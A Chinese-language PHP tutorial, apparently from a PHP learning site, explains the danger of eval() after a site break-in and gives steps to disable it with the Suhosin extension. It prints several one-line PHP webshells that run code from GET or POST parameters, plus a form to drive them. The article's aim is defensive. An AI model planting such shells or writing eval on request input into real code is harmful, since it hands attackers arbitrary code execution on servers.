之前網站收到駭客攻擊,我們才知道php的eval函數有很大的安全隱患。今天我們就來介紹一下禁止eval的方法,有需要的可以參考參考。
前段時間,網站遭受了駭客的入侵,後來在排查中發現了一個php,裡面的內容只有很少:
#<?php eval($_POST[asda123131323156341]);?>
然後網路上搜尋一下php的eval函數,發現這個eval函數帶有很大的安全隱患。
本地測試一下,在本機環境寫一個php,內容如下:
default.php:
<?php eval($_GET[asda]);?>
然後造訪:localhost/test/default.php?asda =phpinfo();
就可以看到已經把phpinfo給執行了。
或是存取localhost/test/default.php?asda = echo 11111;同樣也會發現1111被echo出來了。
類似的手段還有:
<?php $code="${${eval($_GET[c])}}";?>
訪問localhost/test/default.php?c=phpinfo();即可看到
<?php $code=addslashes($_GET[c]); eval(""$code""); ?>
訪問localhost/test/ default.php?c= ${${phpinfo()}};即可看到
利用可以執行php的eval函數,駭客可以用這個來上傳一些後台木馬,比如說上傳php,然後透過url存取這個php來獲得更大的權限。這種稱為一句話木馬的入侵。比如說:寫一個html,內容如下:
<html> <body> <form action="default.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
然後寫一個default.php,內容為:5f557f62ae7ac7a14e0b1cb564790dfc
<?php eval($_POST[c]);?>
這樣的話,想執行什麼php就可以直接提交運行即可。
所以: eval()對於php安全來說具有很大的殺傷力,eval函數減弱了你的應用的安全性,因此一般不用的情況下為了防止類似如下的一句話木馬入侵,需要禁止!
然而網路上很多說使用disable_functions禁止掉eval的方法都是錯的!
其實eval()是無法用php.ini中的disable_functions禁止掉的:
because eval() is a language construct and not a function
eval是zend的,因此不是PHP_FUNCTION 函數;
那麼php怎麼禁止eval呢?
如果想禁掉eval可以用php的擴充 Suhosin:
安裝Suhosin後在php.ini中load進來Suhosin.so,再加上suhosin.executor.disable_eval = on即可!
總結,php的eval函數在php中是無法停用的,因此我們也只有使用外掛了!
至於安裝suhosin來禁止eval函數的步驟為:(未測試)
#說明:
php安裝目錄:/usr/local/php5
#php.ini設定檔路徑:/usr/local/php5/etc/php.ini
Nginx安裝目錄:/usr/local/nginx
Nginx網站根目錄:/usr/ local/nginx/html
1、安裝編譯工具
yum install wget make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils patch perl
2、安裝suhosin
cd /usr/local/src #进入软件包存放目录 wget http://download.suhosin.org/suhosin-0.9.33.tgz #下载 tar zxvf suhosin-0.9.33.tgz #解压 cd suhosin-0.9.33 #进入安装目录 /usr/local/php5/bin/phpize #用phpize生成configure配置文件 ./configure --with-php-config=/usr/local/php5/bin/php-config #配置 make #编译 make install #安装 安装完成之后,出现下面的界面,记住以下路径,后面会用到。 Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/ #suhosin模块路径
3、設定php支援suhosin
vi /usr/local/php5/etc/php.ini #编辑配置文件,在最后一行添加以下内容 extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so suhosin.executor.disable_eval = on
注意:suhosin .executor.disable_eval = on 的功能是停用eval函數
4、測試
vi /usr/local/nginx/html/phpinfo.php #編輯
#<?php phpinfo(); ?>
: wq! #儲存退出
service php-fpm restart #重啟php-fpm
service nginx restart #重啟nginx
注意:如果是apache的話也是一樣的,重啟apache即可。
瀏覽器開啟phpinfo.php 如下圖所示,可以看到suhosin相關資訊
至此,Linux下php安裝suhosin安裝完成!
注意:禁用了 eval後,會有啥後果呢?首先是程式碼裡使用eval 的軟體將無法使用例如大名鼎鼎的Discuz! 論壇和PHPWind論壇將無法正常使用,也影響到phpMyAdmin的舊版本,如果更新到目前最新的3.2.5,就可以使用,只是預設有個警告的提示,在config.inc.php 中加上$cfg['SuhosinDisableWarning']=true;
就可以取消這個警告了。
注意:除了eval之外,還有assert也是類似的用法。
推薦學習:php影片教學
以上是php怎樣才能禁止有安全隱患的eval的詳細內容。更多資訊請關注PHP中文網其他相關文章!